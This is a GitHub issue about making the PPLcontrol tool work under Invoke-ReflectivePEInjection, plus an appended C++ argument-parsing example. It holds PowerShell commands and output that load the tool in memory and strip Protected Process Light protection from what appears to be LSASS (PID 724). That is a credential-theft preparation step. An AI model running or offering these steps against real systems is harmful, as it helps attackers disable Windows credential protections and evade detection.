
Update command line parsing in `PPLcontrol.cpp` to make it compatible with `Invoke-ReflectivePEInjection`

Open HopHouse opened this issue 2 years ago • 0 comments

I made modifications to how command-line arguments are handled in order to make the tool compatible with Invoke-ReflectivePEInjection. Arguments were not used by the program when argc and argv are in use.

I used the shellapi functions CommandLineToArgvW() and GetCommandLineW() to parse arguments. This workaround is mentioned here: https://twitter.com/ShitSecure/status/1459134838431272960?s=20

Now it is working fine:

PS > Import-Module .\Invoke-ReflectivePEInjection.ps1
PS > $pe = [System.IO.File]::ReadAllBytes(".\PPLcontrol.exe")
PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "list" -DoNotZeroMZ

   PID  |  Level  |     Signer      |     EXE sig. level    |     DLL sig. level    |    Kernel addr.
 -------+---------+-----------------+-----------------------+-----------------------+--------------------
      4 | PP  (2) | WinSystem   (7) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387dc483040
    108 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387dc4e5080
    328 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd1b3080
    440 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd021180
    552 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddeb00c0
    560 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddfa0180
    676 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387de61e080
    724 | PPL (1) | Lsa         (4) | Windows        (0x0c) | Microsoft      (0x08) | 0xffff9387de630080
   1704 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387e2113080
   8332 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e3b46300
   7956 | PP  (2) | WinTcb      (6) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387e35f4080
   8656 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e38f1080

[+] Enumerated 12 protected processes.

PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "unprotect 724" -DoNotZeroMZ
[+] The process with PID 724 is no longer a PP(L).

HopHouse · Jun 09 '23 15:06
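Added example, not HopHouse's patch and not PPLcontrol's own code: it shows the approach the issue describes, reading the argument vector from GetCommandLineW() via CommandLineToArgvW() instead of relying on the CRT's argc/argv. On non-Windows builds the example falls back to a portable splitter (my reimplementation of the documented backslash/quote rules, an approximation and not the real API) so the quoting behaviour can be checked anywhere; SplitCommandLine, GetProcessArgs and the main below are names chosen for this example.

```cpp
// Example code (not from the PPLcontrol project): obtain argv from the process
// command-line string rather than from the CRT's argc/argv, so arguments
// supplied by a reflective loader (e.g. -ExeArgs of Invoke-ReflectivePEInjection)
// are honoured. On Windows the real shellapi functions are used; elsewhere a
// portable splitter that follows the same quoting rules is used (assumption:
// it mirrors the documented rules; it is not the API itself).
#include <cstdio>
#include <string>
#include <vector>

#ifdef _WIN32
#include <windows.h>
#include <shellapi.h>
#pragma comment(lib, "shell32.lib")
#endif

// Split a Windows command line into arguments using the documented rules:
// whitespace delimits; "..." groups; 2n backslashes before a quote yield n
// backslashes and a grouping quote; 2n+1 yield n backslashes and a literal
// quote; "" inside a quoted run is a literal quote. argv[0] (the program path)
// is delimited only by whitespace or a closing quote, with no backslash rules.
std::vector<std::wstring> SplitCommandLine(const std::wstring& cmdline) {
    std::vector<std::wstring> argv;
    const size_t n = cmdline.size();
    size_t i = 0;
    auto isSpace = [](wchar_t c) { return c == L' ' || c == L'\t'; };

    while (i < n && isSpace(cmdline[i])) ++i;
    if (i < n) {
        std::wstring prog;
        bool inQuote = false;
        for (; i < n; ++i) {
            wchar_t c = cmdline[i];
            if (c == L'"') { inQuote = !inQuote; continue; }
            if (!inQuote && isSpace(c)) break;
            prog += c;
        }
        argv.push_back(prog);
    }

    for (;;) {
        while (i < n && isSpace(cmdline[i])) ++i;
        if (i >= n) break;
        std::wstring arg;
        bool inQuote = false;
        while (i < n) {
            wchar_t c = cmdline[i];
            if (c == L'\\') {
                size_t bs = 0;
                while (i < n && cmdline[i] == L'\\') { ++bs; ++i; }
                if (i < n && cmdline[i] == L'"') {
                    arg.append(bs / 2, L'\\');
                    if (bs % 2 == 1) { arg += L'"'; ++i; }  // escaped quote
                    // even count: the quote is left for the branch below
                } else {
                    arg.append(bs, L'\\');  // backslashes not before a quote are literal
                }
                continue;
            }
            if (c == L'"') {
                if (inQuote && i + 1 < n && cmdline[i + 1] == L'"') {
                    arg += L'"'; i += 2; continue;  // "" inside quotes -> literal quote
                }
                inQuote = !inQuote; ++i; continue;
            }
            if (!inQuote && isSpace(c)) break;
            arg += c; ++i;
        }
        argv.push_back(arg);
    }
    return argv;
}

// The call the issue relies on: the reflective loader's arguments are visible
// through GetCommandLineW(), so parse that instead of trusting argc/argv.
std::vector<std::wstring> GetProcessArgs() {
#ifdef _WIN32
    int argc = 0;
    LPWSTR* argv = CommandLineToArgvW(GetCommandLineW(), &argc);
    std::vector<std::wstring> out;
    if (argv != nullptr) {
        for (int k = 0; k < argc; ++k) out.emplace_back(argv[k]);
        LocalFree(argv);
    }
    return out;
#else
    return {};  // the API does not exist off Windows; callers use SplitCommandLine
#endif
}

int main() {
    // Dispatch on the parsed vector, e.g. "list" or "unprotect <pid>", as the tool does.
    std::vector<std::wstring> args = GetProcessArgs();
    if (args.empty()) args = SplitCommandLine(L"PPLcontrol.exe unprotect 724");  // constructed sample
    for (size_t k = 0; k < args.size(); ++k) std::wprintf(L"argv[%zu] = %ls\n", k, args[k].c_str());
    return 0;
}
```

The main body shows the shape of the fix: every command the tool understands is looked up in the vector returned by GetProcessArgs(), never in the argc/argv the CRT handed to main, which is why the -ExeArgs strings in the transcript above reach the tool.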